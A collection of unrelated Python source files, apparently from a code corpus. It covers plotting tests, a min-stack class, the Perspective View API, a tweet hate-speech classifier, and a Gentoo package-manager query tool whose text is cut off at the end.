async def test_plot_resource_use(aggregation_level=None, dpi=100):
"""Tests plots.plot_resource_use"""
await plots.plot_resource_use(Path("test_data"),
Path(f"test_plots/stack_{aggregation_level}.png"),
datetime(2020, 1, 1, 12, 53),
end_time=datetime(2020, 1, 2, 7, 4),
aggregation_level=aggregation_level, dpi=dpi)
async def test_plot_resource_use_all_aggregation_levels(
levels_to_try=(None, "minute", "hour", "day", "week", "month", "year"), dpi=100):
"""Runs test_plot_resource_use at every available aggregation level."""
for a_level in levels_to_try:
print(f"Plotting level {a_level}")
await test_plot_resource_use(a_level, dpi=dpi)
if __name__ == "__main__":
asyncio.run(test_plot_resource_use_all_aggregation_levels(dpi=300))
|
py
|
1a5ee88a70643b4a6bb1a78d0d2d04aa8d0d714e
|
class MinStack(object):
def __init__(self):
self.st = []
self.min_st = []
def push(self, x):
self.st.append(x)
if len(self.min_st) == 0 or x <= self.min_st[-1]:
self.min_st.append(x)
def pop(self):
if self.st[-1] <= self.min_st[-1]:
self.min_st.pop()
return self.st.pop()
def top(self):
return self.st[-1]
def getMin(self):
return self.min_st[-1]
# Your MinStack object will be instantiated and called as such:
# obj = MinStack()
# obj.push(x)
# obj.pop()
# param_3 = obj.top()
# param_4 = obj.getMin()
|
py
|
1a5ee8a2001f5d878293f9798d5707379993994e
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from hedp.math.derivative import gradient
from numpy.testing import assert_allclose
from hedp.math.integrals import Int_super_gaussian_ring, Int_super_gaussian
def test_gradient():
y = np.random.rand(100)
assert_allclose(np.gradient(y), gradient(y))
def test_Int_super_gaussian_ring():
a = 2.0
r_c = 10.0
gamma = 4.0
res = Int_super_gaussian_ring(a, r_c, gamma)
assert_allclose(res, np.pi*((r_c+a)**2 - (r_c-a)**2), rtol=1e-1)
def test_Int_super_gaussian():
a = 2.0
gamma = 4.0
res = Int_super_gaussian(a, gamma)
assert_allclose(res, np.pi*(a)**2, rtol=2e-1)
|
py
|
1a5ee8f5e69381aec0b389007d97e826e5c7da22
|
from abc import abstractmethod, ABC
from typing import (
Generic,
TypeVar,
)
from p2p.protocol import Payload
from .types import (
TResponsePayload,
TResult,
)
class BaseNormalizer(ABC, Generic[TResponsePayload, TResult]):
is_normalization_slow = False
"""
This variable indicates how slow normalization is. If normalization requires
any non-trivial computation, consider it slow. Then, the Manager will run it in
a different process.
"""
@staticmethod
@abstractmethod
def normalize_result(message: TResponsePayload) -> TResult:
"""
Convert underlying peer message to final result
"""
...
TPassthrough = TypeVar('TPassthrough', bound=Payload)
class NoopNormalizer(BaseNormalizer[TPassthrough, TPassthrough]):
@staticmethod
def normalize_result(message: TPassthrough) -> TPassthrough:
return message
|
py
|
1a5eea88c34e818ca322bd9dadb63e057907a85b
|
################################################################################
#
# Copyright (c) 2019, the Perspective Authors.
#
# This file is part of the Perspective library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
import os
import pandas
from functools import partial, wraps
from random import random
from .view_config import ViewConfig
from ._data_formatter import to_format, _parse_format_options
from ._constants import COLUMN_SEPARATOR_STRING
from ._utils import _str_to_pythontype
from ._callback_cache import _PerspectiveCallBackCache
from ._date_validator import _PerspectiveDateValidator
from .libbinding import (
make_view_unit,
make_view_zero,
make_view_one,
make_view_two,
to_arrow_unit,
to_arrow_zero,
to_arrow_one,
to_arrow_two,
get_row_delta_unit,
get_row_delta_zero,
get_row_delta_one,
get_row_delta_two,
)
class View(object):
"""A :class:`~perspective.View` object represents a specific transform
(pivot, filter, sort, etc) configuration on an underlying
:class:`~perspective.Table`. :class:`~perspective.View` objects
cannot be directly instantiated - they must be derived from an existing
:class:`~perspective.Table` via the :func:`~perspective.Table.view()`
method.
:class:`~perspective.View` instances receive all updates from the
:class:`~perspective.Table` from which they are derived, and can be
serialized (via ``to_*`` methods) or trigger a callback when it is updated.
:class:`~perspective.View` objects will remain in memory and actively
process updates until :obj:`~perspective.View.delete()` method is called.
"""
def __init__(self, Table, **kwargs):
self._name = "py_" + str(random())
self._table = Table
self._config = ViewConfig(**kwargs)
self._sides = self.sides()
date_validator = _PerspectiveDateValidator()
self._is_unit_context = (
self._table._index == ""
and self._sides == 0
and len(self._config.get_row_pivots()) == 0
and len(self._config.get_column_pivots()) == 0
and len(self._config.get_filter()) == 0
and len(self._config.get_sort()) == 0
and len(self._config.get_computed_columns()) == 0
)
if self._is_unit_context:
self._view = make_view_unit(
self._table._table,
self._name,
COLUMN_SEPARATOR_STRING,
self._config,
date_validator,
)
elif self._sides == 0:
self._view = make_view_zero(
self._table._table,
self._name,
COLUMN_SEPARATOR_STRING,
self._config,
date_validator,
)
elif self._sides == 1:
self._view = make_view_one(
self._table._table,
self._name,
COLUMN_SEPARATOR_STRING,
self._config,
date_validator,
)
else:
self._view = make_view_two(
self._table._table,
self._name,
COLUMN_SEPARATOR_STRING,
self._config,
date_validator,
)
self._column_only = self._view.is_column_only()
self._update_callbacks = self._table._update_callbacks
self._delete_callbacks = _PerspectiveCallBackCache()
self._client_id = None
def get_config(self):
"""Returns a copy of the immutable configuration ``kwargs`` from which
this :class:`~perspective.View` was instantiated.
Returns:
:obj:`dict`: ``kwargs`` supplied to the
:func:`perspective.Table.view()` method.
"""
return self._config.get_config()
def sides(self):
"""An integer representing the # of hierarchial axis on this
:class:`~perspective.View`.
0 - Neither ``row_pivots`` nor ``column_pivots`` properties are set.
1 - ``row_pivots`` is set.
2 - ``column_pivots`` is set (and also maybe ``row_pivots``).
Returns:
:obj:`int`: 0 <= N <= 2
"""
if (
len(self._config.get_row_pivots()) > 0
or len(self._config.get_column_pivots()) > 0
):
if len(self._config.get_column_pivots()) > 0:
return 2
else:
return 1
else:
return 0
def num_rows(self):
"""The number of aggregated rows in the :class:`~perspective.View`.
This count includes the total aggregate rows for all ``row_pivots``
depth levels, and can also be affected by any applied ``filter``.
Returns:
:obj:`int`: Number of rows.
"""
return self._view.num_rows()
def num_columns(self):
"""The number of aggregated columns in the :class:`~perspective.View`.
This is affected by the ``column_pivots`` that are applied to the
:class:`~perspective.View`.
Returns:
:obj:`int`: Number of columns.
"""
return self._view.num_columns()
def get_row_expanded(self, idx):
"""Returns whether row at `idx` is expanded or collapsed.
Returns:
:obj:`bool`: Is this row expanded?
"""
return self._view.get_row_expanded(idx)
def expand(self, idx):
"""Expands the row at 'idx', i.e. displaying its leaf rows.
Args:
idx (:obj:`int`): Row index to expand.
"""
return self._view.expand(idx, len(self._config.get_row_pivots()))
def collapse(self, idx):
"""Collapses the row at 'idx', i.e. hiding its leaf rows.
Args:
idx (:obj:`int`): Row index to collapse.
"""
return self._view.collapse(idx)
def set_depth(self, depth):
"""Sets the expansion depth of the pivot tree.
Args:
depth (:obj:`int`): Depth to collapse all nodes to, which
may be no greater then the length of the ``row_pivots``
property.
"""
return self._view.set_depth(depth, len(self._config.get_row_pivots()))
def column_paths(self):
"""Returns the names of the columns as they show in the
:class:`~perspective.View`, i.e. the hierarchial columns when
``column_pivots`` is applied.
Returns:
:obj:`list` of :obj`str`: Aggregated column names.
"""
paths = self._view.column_paths()
string_paths = []
for path in paths:
string_paths.append(
COLUMN_SEPARATOR_STRING.join([p.to_string(False) for p in path])
)
return string_paths
def schema(self, as_string=False):
"""The schema of this :class:`~perspective.View`, which is a key-value
map that contains the column names and their Python data types.
If the columns are aggregated, their aggregated types will be shown
returned instead.
Keyword Args:
as_string (:obj:`bool`): returns data types as string
representations, if ``True``.
Returns:
:obj:`dict`: A map of :obj:`str` column name to :obj:`str` or
:obj:`type`, depending on the value of ``as_string`` kwarg.
"""
if as_string:
return {item[0]: item[1] for item in self._view.schema().items()}
return {
item[0]: _str_to_pythontype(item[1]) for item in self._view.schema().items()
}
def computed_schema(self, as_string=False):
if as_string:
return {item[0]: item[1] for item in self._view.computed_schema().items()}
return {
item[0]: _str_to_pythontype(item[1])
for item in self._view.computed_schema().items()
}
def on_update(self, callback, mode=None):
"""Add a callback to be fired when :func:`perspective.Table.update()` is
called on the parent :class:`~perspective.Table`.
Multiple callbacks can be set through calling ``on_update`` multiple
times, and will be called in the order they are set. Callback must be a
callable function that takes exactly 1 or 2 parameters, depending on
whether `on_update` is called with `mode="row"`. The first parameter is
always `port_id`, an :obj:`int` that indicates which input port the
update comes from. A `RuntimeError` will be thrown if the callback
has mis-configured parameters.
Args:
callback (:obj:`callable`): a callable function reference that will
be called when :func:`perspective.Table.update()` is called.
mode (:obj:`str`): if set to "row", the callback will be passed
an Arrow-serialized dataset of the rows that were updated.
Defaults to "none".
Examples:
>>> def updater(port_id):
... print("Update fired on port", port_id)
>>> def updater_with_delta(port_id, delta):
... print("Update on port", port_id, "delta len:", len(delta)))
>>> view.on_update(updater)
>>> view.on_update(updater, mode="row")
>>> table.update({"a": [1]})'
>>> Update fired on port 0
>>> Update on port 0 delta len: 64
"""
self._table._state_manager.call_process(self._table._table.get_id())
mode = mode or "none"
if not callable(callback):
raise ValueError("Invalid callback - must be a callable function")
if mode not in ["none", "row"]:
raise ValueError(
'Invalid update mode {} - valid on_update modes are "none" or "row"'.format(
mode
)
)
if mode == "row":
if not self._view._get_deltas_enabled():
self._view._set_deltas_enabled(True)
wrapped_callback = partial(
self._wrapped_on_update_callback, mode=mode, callback=callback
)
self._update_callbacks.add_callback(
{
"name": self._name,
"orig_callback": callback,
"callback": wrapped_callback,
}
)
def remove_update(self, callback):
"""Given a callback function, remove it from the list of callbacks.
Args:
callback (:obj:`func`): a function reference that will be removed.
Examples:
>>> table = perspective.Table(data)
>>> view = table.view()
>>> view2 = table.view()
>>> def callback():
... print("called!")
>>> view.on_update(callback)
>>> view2.on_update(callback)
>>> table.update(new_data)
called!
>>> view2.remove_update(callback)
>>> table.update(new_data) # callback removed and will not fire
"""
self._table._state_manager.call_process(self._table._table.get_id())
if not callable(callback):
return ValueError("remove_update callback should be a callable function!")
self._update_callbacks.remove_callbacks(
lambda cb: cb["orig_callback"] == callback
)
def on_delete(self, callback):
"""Set a callback to be run when the :func:`perspective.View.delete()`
method is called on this :class:`~perspective.View`.
Args:
callback (:obj:`callable`): A callback to run after
:func:`perspective.View.delete()` method has been called.
Examples:
>>> def deleter():
>>> print("Delete called!")
>>> view.on_delete(deleter)
>>> view.delete()
>>> Delete called!
"""
if not callable(callback):
return ValueError("on_delete callback must be a callable function!")
self._delete_callbacks.add_callback(callback)
def delete(self):
"""Delete the :class:`~perspective.View` and clean up all associated
callbacks.
This method must be called to clean up callbacks used by the
:class:`~perspective.View`, as well as allow for deletion of the
underlying :class:`~perspective.Table`.
Examples:
>>> table = perspective.Table(data)
>>> view = table.view()
>>> view.delete()
"""
self._table._state_manager.remove_process(self._table._table.get_id())
self._table._views.pop(self._table._views.index(self._name))
# remove the callbacks associated with this view
self._update_callbacks.remove_callbacks(lambda cb: cb["name"] == self._name)
[cb() for cb in self._delete_callbacks]
def remove_delete(self, callback):
"""Remove the delete callback associated with this
:class:`~perspective.View`.
Args:
callback (:obj:`callable`): A reference to a callable function that
will be removed from delete callbacks.
Examples:
>>> table = perspective.Table(data)
>>> view = table.view()
>>> view2 = table.view()
>>> def callback():
... print("called!")
>>> view.on_delete(callback)
>>> view2.on_delete(callback)
>>> view.delete()
called!
>>> view2.remove_delete(callback)
>>> view2.delete() # callback removed and will not fire
"""
if not callable(callback):
return ValueError("remove_delete callback should be a callable function!")
self._delete_callbacks.remove_callbacks(lambda cb: cb == callback)
def to_arrow(self, **kwargs):
options = _parse_format_options(self, kwargs)
if self._is_unit_context:
return to_arrow_unit(
self._view,
options["start_row"],
options["end_row"],
options["start_col"],
options["end_col"],
)
elif self._sides == 0:
return to_arrow_zero(
self._view,
options["start_row"],
options["end_row"],
options["start_col"],
options["end_col"],
)
elif self._sides == 1:
return to_arrow_one(
self._view,
options["start_row"],
options["end_row"],
options["start_col"],
options["end_col"],
)
else:
return to_arrow_two(
self._view,
options["start_row"],
options["end_row"],
options["start_col"],
options["end_col"],
)
def to_records(self, **kwargs):
"""Serialize the :class:`~perspective.View`'s dataset into a :obj:`list`
of :obj:`dict` containing each row.
By default, the entire dataset is returned, though this can be windowed
via ``kwargs``. When ``row_pivots`` are applied, a ``__ROW_PATH__``
column name will be generated in addition to the applied ``columns``.
When ``column_pivots`` are applied, column names will be qualified
with their column group name.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to ``False``).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to ``False``).
Returns:
:obj:`list` of :obj:`dict`: A list of :obj:`dict`, where each dict
represents a row of the current state of the
:class:`~perspective.View`.
"""
return to_format(kwargs, self, "records")
def to_dict(self, **options):
"""Serialize the :class:`~perspective.View`'s dataset into a :obj:`dict`
of :obj:`str` keys and :obj:`list` values. Each key is a column name,
and the associated value is the column's data packed into a :obj:`list`.
If the :class:`~perspective.View` is aggregated, the aggregated dataset
will be returned.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to ``False``).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to ``False``).
Returns:
:obj:`dict`: A dictionary with string keys and list values, where
key = column name and value = column values.
"""
return to_format(options, self, "dict")
def to_numpy(self, **options):
"""Serialize the view's dataset into a :obj:`dict` of :obj:`str` keys
and :class:`numpy.array` values. Each key is a column name, and the
associated value is the column's data packed into a numpy array.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to ``False``).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to ``False``).
Returns:
:obj:`dict` of :class:`numpy.array`: A dictionary with string keys
and numpy array values, where key = column name and
value = column values.
"""
return to_format(options, self, "numpy")
def to_df(self, **options):
"""Serialize the view's dataset into a pandas dataframe.
If the view is aggregated, the aggregated dataset will be returned.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to ``False``).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to ``False``).
Returns:
:class:`pandas.DataFrame`: A DataFrame serialization of the current
state of this :class:`~perspective.View`.
"""
cols = self.to_numpy(**options)
return pandas.DataFrame(cols)
def to_csv(self, **options):
"""Serialize the :class:`~perspective.View`'s dataset into a CSV string.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to False).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to False).
date_format (:obj:`str`): How ``datetime`` objects should be
formatted in the CSV.
Returns:
:obj:`str`: A CSV-formatted string containing the serialized data.
"""
date_format = None
# Handle to_csv calls from `<perspective-viewer>`, which uses the
# JavaScript Intl.DateTimeFormat API that takes a locale instead of a
# string format.
# TODO This should move to portable code.
if options.pop("formatted", False):
date_format = "%Y/%m/%d %H:%M:%S"
return self.to_df(**options).to_csv(
date_format=date_format,
line_terminator="\r\n" if os.name == "nt" else "\n",
)
@wraps(to_records)
def to_json(self, **options):
return self.to_records(**options)
@wraps(to_dict)
def to_columns(self, **options):
return self.to_dict(**options)
def _get_row_delta(self):
if self._is_unit_context:
return get_row_delta_unit(self._view)
elif self._sides == 0:
return get_row_delta_zero(self._view)
elif self._sides == 1:
return get_row_delta_one(self._view)
else:
return get_row_delta_two(self._view)
def _num_hidden_cols(self):
"""Returns the number of columns that are sorted but not shown."""
hidden = 0
columns = self._config.get_columns()
for sort in self._config.get_sort():
if sort[0] not in columns:
hidden += 1
return hidden
def _wrapped_on_update_callback(self, **kwargs):
"""Provide the user-defined callback function with additional metadata
from the view.
"""
mode = kwargs["mode"]
port_id = kwargs["port_id"]
cache = kwargs["cache"]
callback = kwargs["callback"]
if cache.get(port_id) is None:
cache[port_id] = {}
if mode == "row":
if cache[port_id].get("row_delta") is None:
cache["row_delta"] = self._get_row_delta()
callback(port_id, cache["row_delta"])
else:
callback(port_id)
|
py
|
1a5eeaca70d3e7fa4890162cd2a9226ae4c16c94
|
import uvicorn
if __name__ == "__main__":
uvicorn.run("api:app", host="0.0.0.0", port=80, reload=True)
|
pyw
|
1a5eec00a6d61d2b62a72e7f32c02cd94f434b5a
|
import os
import subprocess
MAIN_LOCATION = os.path.dirname(os.path.abspath(__file__)) + '/src/__main__.py'
# MAIN_LOCATION = os.path.dirname(os.path.abspath(__file__)) + '/__main__.py'
subprocess.run(
['pyw', MAIN_LOCATION],
creationflags=subprocess.CREATE_NO_WINDOW,
check=False
)
|
py
|
1a5eec364ffc7c17c0aeeba54f53bf34b39ef9d1
|
import pandas as pd
import numpy as np
import pickle
import sys
from sklearn.feature_extraction.text import TfidfVectorizer
import nltk
from nltk.stem.porter import *
import string
import re
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer as VS
from textstat.textstat import *
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import SelectFromModel
from sklearn.metrics import classification_report
from sklearn.svm import LinearSVC
import matplotlib.pyplot as plt
import seaborn
from sklearn.model_selection import train_test_split
from sklearn.model_selection import StratifiedKFold, GridSearchCV
from sklearn.pipeline import Pipeline
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
# df = pd.read_csv("../data/labeled_data.csv")
df = pd.read_csv("../data/MMHS10K_data.csv")
df_test = pd.read_csv("../data/MMHS10K_test_data.csv")
out_file = open('../../../datasets/HateSPic/HateSPic/davison/MMHS10K_v2mm_testScores.txt','w')
df.describe()
df.columns
df['class'].hist()
tweets=df.tweet
tweets_test=df_test.tweet
# Feature generation
stopwords=stopwords = nltk.corpus.stopwords.words("english")
other_exclusions = ["#ff", "ff", "rt"]
stopwords.extend(other_exclusions)
stemmer = PorterStemmer()
def preprocess(text_string):
"""
Accepts a text string and replaces:
1) urls with URLHERE
2) lots of whitespace with one instance
3) mentions with MENTIONHERE
This allows us to get standardized counts of urls and mentions
Without caring about specific people mentioned
"""
space_pattern = '\s+'
giant_url_regex = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'
'[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
mention_regex = '@[\w\-]+'
parsed_text = re.sub(space_pattern, ' ', text_string)
parsed_text = re.sub(giant_url_regex, '', parsed_text)
parsed_text = re.sub(mention_regex, '', parsed_text)
return parsed_text
def tokenize(tweet):
"""Removes punctuation & excess whitespace, sets to lowercase,
and stems tweets. Returns a list of stemmed tokens."""
tweet = " ".join(re.split("[^a-zA-Z]*", tweet.lower())).strip()
tokens = [stemmer.stem(t) for t in tweet.split()]
return tokens
def basic_tokenize(tweet):
"""Same as tokenize but without the stemming"""
tweet = " ".join(re.split("[^a-zA-Z.,!?]*", tweet.lower())).strip()
return tweet.split()
vectorizer = TfidfVectorizer(
tokenizer=tokenize,
preprocessor=preprocess,
ngram_range=(1, 3),
stop_words=stopwords,
use_idf=True,
smooth_idf=False,
norm=None,
decode_error='replace',
max_features=10000,
min_df=5,
max_df=0.75
)
#Construct tfidf matrix and get relevant scores
tfidf = vectorizer.fit_transform(tweets).toarray()
tfidf_test = vectorizer.transform(tweets_test).toarray()
vocab = {v:i for i, v in enumerate(vectorizer.get_feature_names())}
idf_vals = vectorizer.idf_
idf_dict = {i:idf_vals[i] for i in vocab.values()} #keys are indices; values are IDF scores
#Get POS tags for tweets and save as a string
tweet_tags = []
for t in tweets:
tokens = basic_tokenize(preprocess(t))
tags = nltk.pos_tag(tokens)
tag_list = [x[1] for x in tags]
tag_str = " ".join(tag_list)
tweet_tags.append(tag_str)
#Get POS tags for tweets and save as a string
tweet_tags_test = []
for t in tweets_test:
tokens = basic_tokenize(preprocess(t))
tags = nltk.pos_tag(tokens)
tag_list = [x[1] for x in tags]
tag_str = " ".join(tag_list)
tweet_tags_test.append(tag_str)
#We can use the TFIDF vectorizer to get a token matrix for the POS tags
pos_vectorizer = TfidfVectorizer(
tokenizer=None,
lowercase=False,
preprocessor=None,
ngram_range=(1, 3),
stop_words=None,
use_idf=False,
smooth_idf=False,
norm=None,
decode_error='replace',
max_features=5000,
min_df=5,
max_df=0.75,
)
#Construct POS TF matrix and get vocab dict
pos = pos_vectorizer.fit_transform(pd.Series(tweet_tags)).toarray()
pos_test = pos_vectorizer.transform(pd.Series(tweet_tags_test)).toarray()
pos_vocab = {v:i for i, v in enumerate(pos_vectorizer.get_feature_names())}
# Now get other features
sentiment_analyzer = VS()
def count_twitter_objs(text_string):
"""
Accepts a text string and replaces:
1) urls with URLHERE
2) lots of whitespace with one instance
3) mentions with MENTIONHERE
4) hashtags with HASHTAGHERE
This allows us to get standardized counts of urls and mentions
Without caring about specific people mentioned.
Returns counts of urls, mentions, and hashtags.
"""
space_pattern = '\s+'
giant_url_regex = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'
'[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
mention_regex = '@[\w\-]+'
hashtag_regex = '#[\w\-]+'
parsed_text = re.sub(space_pattern, ' ', text_string)
parsed_text = re.sub(giant_url_regex, 'URLHERE', parsed_text)
parsed_text = re.sub(mention_regex, 'MENTIONHERE', parsed_text)
parsed_text = re.sub(hashtag_regex, 'HASHTAGHERE', parsed_text)
return (parsed_text.count('URLHERE'), parsed_text.count('MENTIONHERE'), parsed_text.count('HASHTAGHERE'))
def other_features(tweet):
"""This function takes a string and returns a list of features.
These include Sentiment scores, Text and Readability scores,
as well as Twitter specific features"""
sentiment = sentiment_analyzer.polarity_scores(tweet)
words = preprocess(tweet) # Get text only
syllables = textstat.syllable_count(words)
num_chars = sum(len(w) for w in words)
num_chars_total = len(tweet)
num_terms = len(tweet.split())
num_words = len(words.split())
avg_syl = round(float((syllables + 0.001)) / float(num_words + 0.001), 4)
num_unique_terms = len(set(words.split()))
###Modified FK grade, where avg words per sentence is just num words/1
FKRA = round(float(0.39 * float(num_words) / 1.0) + float(11.8 * avg_syl) - 15.59, 1)
##Modified FRE score, where sentence fixed to 1
FRE = round(206.835 - 1.015 * (float(num_words) / 1.0) - (84.6 * float(avg_syl)), 2)
twitter_objs = count_twitter_objs(tweet)
retweet = 0
if "rt" in words:
retweet = 1
features = [FKRA, FRE, syllables, avg_syl, num_chars, num_chars_total, num_terms, num_words,
num_unique_terms, sentiment['neg'], sentiment['pos'], sentiment['neu'], sentiment['compound'],
twitter_objs[2], twitter_objs[1],
twitter_objs[0], retweet]
# features = pandas.DataFrame(features)
return features
def get_feature_array(tweets):
feats = []
for t in tweets:
feats.append(other_features(t))
return np.array(feats)
other_features_names = ["FKRA", "FRE","num_syllables", "avg_syl_per_word", "num_chars", "num_chars_total", \
"num_terms", "num_words", "num_unique_words", "vader neg","vader pos","vader neu", \
"vader compound", "num_hashtags", "num_mentions", "num_urls", "is_retweet"]
feats = get_feature_array(tweets)
feats_test = get_feature_array(tweets_test)
#Now join them all up
M = np.concatenate([tfidf,pos,feats],axis=1)
M_test = np.concatenate([tfidf_test,pos_test,feats_test],axis=1)
M.shape
M_test.shape
#Finally get a list of variable names
variables = ['']*len(vocab)
for k,v in vocab.items():
variables[v] = k
pos_variables = ['']*len(pos_vocab)
for k,v in pos_vocab.items():
pos_variables[v] = k
feature_names = variables+pos_variables+other_features_names
# Running the model
# The best model was selected using a GridSearch with 5-fold CV.
X = pd.DataFrame(M)
y = df['class'].astype(int)
X_test = pd.DataFrame(M_test)
y_test = df_test['class'].astype(int)
X_train, X_test_notused, y_train, y_test_notused = train_test_split(X, y, random_state=42, test_size=0)
pipe = Pipeline(
[('select', SelectFromModel(LogisticRegression(class_weight='balanced',
penalty="l1", C=0.01))),
('model', LogisticRegression(class_weight='balanced',penalty='l2'))])
param_grid = [{}] # Optionally add parameters here
grid_search = GridSearchCV(pipe,
param_grid,
cv=StratifiedKFold(n_splits=5,
random_state=42).split(X_train, y_train),
verbose=2)
model = grid_search.fit(X_train, y_train)
y_preds = model.predict(X_test)
y_probs = model.predict_proba(X_test)
for c,result in enumerate(y_preds):
tweet_id = df_test['tweet_id'][c]
hate_prob = y_probs[c,0]
not_hate_prob = y_probs[c, 1]
out_file.write(str(tweet_id)+','+str(result)+','+str(hate_prob)+','+str(not_hate_prob)+'\n')
# Evaluating the results
report = classification_report( y_test, y_preds )
print(report)
|
py
|
1a5eec92ae9a79e4312648e77c77d3211881c669
|
#!/usr/bin/python
# vim:fileencoding=utf-8
# (c) 2017 Michał Górny <[email protected]>
# Released under the terms of the 2-clause BSD license.
import argparse, os.path
from abc import abstractmethod
from . import PV, get_package_manager
from .exceptions import (AmbiguousPackageSetError, EmptyPackageSetError,
InvalidAtomStringError)
from .submodules import _supported_pms, get_pm
from .util import ABCObject
def _reponame(val):
"""
Check the value for correctness as repository name. In fact, it only ensures
it isn't a path so that it won't confuse pm.repositories[val].
@param val: the config option value
@type val: string
@return: whether the value is a correct repo name
@rtype: bool
"""
if os.path.isabs(val):
raise ValueError('Invalid repository name: %s' % val)
return val
def AtomFormatDict(a):
return {
'key': a.key,
'path': a.path,
'repository': a.repository,
'slot': a.slot,
'subslot': a.subslot,
'version': a.version,
'slotted_atom': a.slotted_atom,
'versioned_atom': a,
'unversioned_atom': a.unversioned_atom,
}
class PMQueryCommand(ABCObject):
""" A single gentoopmq command. """
@classmethod
def help(self):
"""
Return the help string for a sub-command.
@return: the help string
@rtype: string
"""
descdoc = ' '.join(self.__doc__.split())
descdoc = descdoc[0].lower() + descdoc[1:]
return descdoc.rstrip('.')
def __init__(self, argparser):
"""
Instantiate the subcommand, setting argument parser as necessary.
@param argparser: sub-command argument parser
@type argparser: C{argparse.ArgumentParser}
"""
argparser.set_defaults(instance = self)
self._arg = argparser
@abstractmethod
def __call__(self, pm, args):
"""
Call the sub-command, passing pm (a working PackageManager instance)
and args (the result of argument parsing). Can return exit code
for the process if relevant. If it doesn't, 0 will be used.
@param pm: package manager instance
@type pm: L{PackageManager}
@param args: command arguments
@type args: C{argparse.Namespace}
@return: Process exit code or None if irrelevant
@rtype: bool/None
"""
pass
class PMQueryCommands(object):
""" The container of all standard gentoopmq commands. """
# === generic information ===
class package_manager(PMQueryCommand):
"""
Get the name of a working, preferred PM.
"""
def __init__(self, argparser):
PMQueryCommand.__init__(self, argparser)
argparser.add_argument('-v', '--with-version',
action='store_true', dest='version',
help='Print the version as well')
def __call__(self, pm, args):
if args.version:
print('%s %s' % (pm.name, pm.version))
else:
print(pm.name)
# === repository info ===
class repositories(PMQueryCommand):
"""
Print the list of ebuild repositories.
"""
def __call__(self, pm, args):
print(' '.join([r.name for r in pm.repositories]))
class repo_path(PMQueryCommand):
"""
Print the path to the named repository.
"""
def __init__(self, argparser):
PMQueryCommand.__init__(self, argparser)
argparser.add_argument('repo_name', type=_reponame,
help='The repository name to look up')
def __call__(self, pm, args):
try:
r = pm.repositories[args.repo_name]
except KeyError:
self._arg.error('No repository named %s' % args.repo_name)
return 1
print(r.path)
# === package matching ===
class match(PMQueryCommand):
"""
Print packages matching the specified atom.
"""
def __init__(self, argparser):
PMQueryCommand.__init__(self, argparser)
argparser.add_argument('-b', '--best', action='store_true',
help='Print only the best version')
argparser.add_argument('-s', '--best-in-slot', action='store_true',
help='Print the best version in each available slot')
argparser.add_argument('-f', '--format', default='{versioned_atom}',
help=('Output format string (can include: '
+ '{versioned_atom}, {unversioned_atom}, {slotted_atom}, '
+ '{key}, {key.category}, {key.package}, '
+ '{version}, {version.revision}, {version.without_revision}, '
+ '{slot}, {subslot}, {repository}, {path})'))
argparser.add_argument('package_atom', nargs='+',
help='The package atom to match')
def __call__(self, pm, args):
if args.best and args.best_in_slot:
self._arg.error('--best and --best-in-slot are mutually exclusive')
for in_atom in args.package_atom:
try:
a = pm.Atom(in_atom)
except InvalidAtomStringError as e:
self._arg.error(e)
return 1
pkgs = pm.stack.filter(a)
if args.best_in_slot:
pkgs = [pg.best for pg in pkgs.group_by('slotted_atom')]
if args.best:
try:
pkgs = (pkgs.best,)
except AmbiguousPackageSetError:
self._arg.error('Multiple disjoint packages match %s' % in_atom)
return 1
except EmptyPackageSetError:
self._arg.error('No packages match %s' % in_atom)
return 1
for p in pkgs:
print(args.format.format(**AtomFormatDict(p)))
# === shell ===
class shell(PMQueryCommand):
"""
Run a Python shell with current PM selected.
"""
def __call__(self, pm, args):
